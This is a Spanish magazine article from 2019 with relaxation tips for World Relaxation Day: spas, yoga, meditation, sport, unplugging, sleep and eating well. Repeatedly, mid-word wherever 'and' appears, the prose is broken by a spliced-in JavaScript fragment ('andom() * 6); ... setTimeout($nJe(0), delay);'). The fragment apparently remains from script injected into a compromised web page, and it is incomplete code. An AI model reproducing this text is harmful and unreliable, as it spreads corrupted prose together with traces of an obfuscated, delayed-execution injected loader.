Adiós estrés, hola día internacional de la relajación

    Adiós estrés, hola día internacional de la relajación

    Tu cuerpo te lo va a agradecer

    Autor: Redacción Maxim 14 agosto, 2019



    Shutterstock

     

    La mejor manera de celebrar el Día Mundial de la Relajación

     

     

    ¡Basta de estrés! Hoy es el día mundial de la relajación y hemos decidido que nada ni nadie evitará que lo celebremos en forma. Te invitamos a unirte y te damos algunas ideas para que, ya sea hoy, o el fin de semana, te regales el descanso que te mereces y lo complementes con algunas técnicas de relajación.

     

     

    Beneficios de relajarse

     

    Darte un descanso es muy importante. Vivir en una ciudad, trabajar en grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes empresas y además tener una vida social activa, puede estar estresándote.

     

    ¿Sabías que la relajación es el estado natural del ser humano? Pensamos que lo normal es andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andar acelerados todo el tiempo, pues lo consideramos sinónimo de efectividad y éxito, pero esto no es así. Para lograr una existencia plena, es INDISPENSABLE, saber relajarse.

     

    Si quieres tener un metabolismo equilibrado, un corazón saludable y un estado mental de paz, a continuación te damos una serie de recomendaciones para relajarte.

     

     

     

    Cómo lograr la relajación

     

    Spa

     

     

    Existen muchos espacios a donde puedes acudir a recibir un tratamiento integral de relajación. Desde una sesión de masaje hasta un fin de semana fuera de la ciudad, procura cada tanto regalarte un espacio en el que puedas consentir a tu cuerpo con terapias destinadas a la relajación.

     

    Yoga

     

    Esta práctica ancestral es uno de tus mejores aliados para lograr la relajación. Puedes unirte a una clase si es que nunca la has practicado, o si ya tienes experiencia, hacerlo por tu cuenta en un lugar tranquilo y bien ventilado. Toma el mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de tu cuerpo con los asanas y controla tu respiración al ritmo de los movimientos.

     

    Meditación

     

    Si te has estado rehusandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a practicar meditación es porque seguramente piensas que eso es para expertos y para gente que tiene mucho tiempo libre. Hay cientos de audios disponibles de manera gratuita en línea que te guiarán a través de una sesión. El tiempo que dure cada una, lo decides tú. Puede ser desde 15 minutos hasta dos horas. Te recomendamos comenzar con poco tiempo pues la mente tiende a divagar y puede frustrarte. También existen clases grupales guiadas por un profesor.

     

    Deporte

    Sin duda practicar un deporte es la mejor forma que tienes de relajarte. Practicar diario una disciplina no sólo fortalece tu cuerpo y mejora tu salud, sino que también genera estados de relajación y bienestar profundos gracias a la segregación de endorfinas. Además, despejar la mente de la rutina diaria y convivir con otras personas te ayudará a sentirte mejor. Puede ser desde una sesión de cardio, una clase de baile o una refrescante hora de natación.

     

     

    Desconectarse

    Design Apple GIF - Find & Share on GIPHY

     

    Todo el día, a todas horas estamos pegados a los dispositivos electrónicos. Estamos constantemente leyendo noticias, revisandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando redes sociales y contestandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando correos electrónicos.  Es necesario despegarse de las pantallas de celulares, computadoras y tabletas. Te invitamos a que un día a la semana (por lo menos) apagues tu celular y no te acerques a él. Sal a caminar, lee un buen libro, platica con tus seres queridos o juega con tu perro. ¡Haz lo que sea pero deja de lado la tecnología! Vas a notar un cambio inmediato.

     

     

    Dormir  y alimentarse bien

     

     

    Muchos no saben de la importancia de estos dos elementos. Otra idea errónea de nuestra época es pensar que para ser triunfador y exitoso tienes que empezar el día desde muy temprano y dormir tarde, para sacar el máximo provecho de tus actividades. Además, comer cualquier cosa y rápido se ha hecho costumbre.  Una persona necesita entre 8-10 horas de sueño. Tu cuerpo requiere noches de descanso para regenerarse.  Si además eres de los que le encanta desvelarse constantemente por la fiesta, puedes estar provocándole más daño a tu cuerpo.

     

    Baja un cambio. Duerme y aliméntate bien. Tómate tu tiempo para las comidas e ingiere alimentos saludables. Tu cuerpo te lo va a agradecer.

     

     

    Ya que andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andamos en esas, chécate estos 

Temas relacionados con esta nota: , , ,

Tu cuerpo te lo va a agradecer